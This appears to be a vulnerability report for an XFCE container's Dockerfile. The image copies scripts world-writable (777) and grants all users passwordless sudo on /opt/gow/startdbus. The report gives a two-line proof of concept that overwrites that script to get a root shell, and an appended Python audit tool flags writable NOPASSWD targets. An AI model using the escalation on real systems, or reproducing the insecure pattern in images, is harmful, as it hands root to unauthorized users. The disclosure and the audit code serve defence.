Due to these lines in the XFCE Container's Dockerfile:

```dockerfile
COPY --chmod=777 scripts/launch-comp.sh scripts/startup.sh /opt/gow/
COPY --chmod=777 scripts/startdbus.sh /opt/gow/startdbus
```

any unprivileged user can escalate to root by simply writing to the startdbus script, which is passwordless when using sudo, as we can see in:

```dockerfile
# Allow anyone to start dbus without password
RUN echo "\nALL ALL=NOPASSWD: /opt/gow/startdbus" >> /etc/sudoers
```

This can be problematic if any unauthorized user gets access and potentially compromises the system.

POC (simplest POC I've ever written tbh 😭):

```bash
echo "bash" > /opt/gow/startdbus
sudo /opt/gow/startdbus
```
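An image-audit check for the pattern reported above, as an added example that is not part of the issue or the project's code: it lists the commands a sudoers file grants with NOPASSWD and flags any whose file or parent directories a non-root user could modify. The names `nopasswd_commands`, `audit`, `demo`, `root` and `trusted_uid` are hypothetical, and the sudoers parsing is simplified (no aliases, includes or line continuations).

```python
import os
import stat
import tempfile

# Constructed sample: the sudoers rule quoted in the issue.
SUDOERS = "# Allow anyone to start dbus without password\nALL ALL=NOPASSWD: /opt/gow/startdbus\n"

def nopasswd_commands(sudoers_text):
    """Absolute command paths granted NOPASSWD (simplified sudoers parsing)."""
    commands = []
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if line.startswith("#") or "NOPASSWD:" not in line:
            continue
        for entry in line.split("NOPASSWD:", 1)[1].split(","):
            words = entry.split()
            if words and words[0].startswith("/"):
                commands.append(words[0])
    return commands

def audit(sudoers_text, root="/", trusted_uid=0):
    """(command, path, reason) for the command and each parent dir below root that is unsafe."""
    findings = []
    for cmd in nopasswd_commands(sudoers_text):
        parts = cmd.strip("/").split("/")
        for depth in range(len(parts), 0, -1):
            path = os.path.join(root, *parts[:depth])
            if not os.path.exists(path):
                continue
            st = os.stat(path)
            mode = stat.S_IMODE(st.st_mode)
            sticky_dir = stat.S_ISDIR(st.st_mode) and bool(mode & stat.S_ISVTX)
            if st.st_uid != trusted_uid:
                findings.append((cmd, path, f"owner uid {st.st_uid}"))
            if mode & 0o022 and not sticky_dir:
                findings.append((cmd, path, f"mode {mode:o}"))
    return findings

def demo(script_mode):
    """Audit a constructed /opt/gow tree whose script has the given mode."""
    root = tempfile.mkdtemp()
    gow = os.path.join(root, "opt", "gow")
    os.makedirs(gow)
    for d in (os.path.join(root, "opt"), gow):
        os.chmod(d, 0o755)
    script = os.path.join(gow, "startdbus")
    open(script, "w").close()
    os.chmod(script, script_mode)
    return [(c, r) for c, _, r in audit(SUDOERS, root, os.geteuid())]
```

Against a real image, point `root` at the unpacked filesystem and leave `trusted_uid` at 0; `demo` passes the current uid only because its constructed tree is not owned by root.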